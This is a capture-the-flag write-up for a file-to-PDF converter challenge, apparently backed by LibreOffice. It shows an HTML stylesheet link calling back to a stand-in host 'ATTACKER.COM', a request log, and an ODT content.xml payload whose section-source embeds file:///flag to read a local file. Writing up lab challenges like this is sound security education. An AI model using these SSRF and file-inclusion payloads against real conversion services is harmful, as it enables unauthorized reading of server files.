Free converter for everyone. You find the flag at : /flag Link:
We are given a black-box web challenge. This application allows us to upload files in various formats (.doc, .jpg, etc.) and converts them into a PDF for us to download.
The first thing that came to mind was whether I can upload arbitrary HTML, since HTML has plenty of potential SSRF / file inclusion vectors. Sure enough, when I uploaded the following HTML file, I got a callback to my server.
<link rel=stylesheet href='http://ATTACKER.COM/exploit.css'>
Hello world.
The User-Agent showed that LibreOffice was making the callback.
OPTIONS /exploit.css HTTP/1.1
User-Agent: LibreOffice
Cache-Control: no-cache
Pragma: no-cache
X-Forwarded-Proto: http
Accept-Encoding: gzip
Interesting! So LibreOffice is being used to convert the documents. I searched around a bit and came across this writeup on SSRF using LibreOffice documents.
We create a sample LibreOffice word document, poc.odt. After unzipping the ODT file, we can modify the content.xml file to include our payload. We create a text:section tag that links to the /flag file.
<?xml version="1.0" encoding="UTF-8"?>
<office:document-content ...>
<text:section text:name="string"><text:section-source
xlink:href="file:///flag" xlink:type="simple" xlink:show="embed"
Then, zipping the files again into a modified.odt gives us our payload. Uploading this to the server gives us the flag!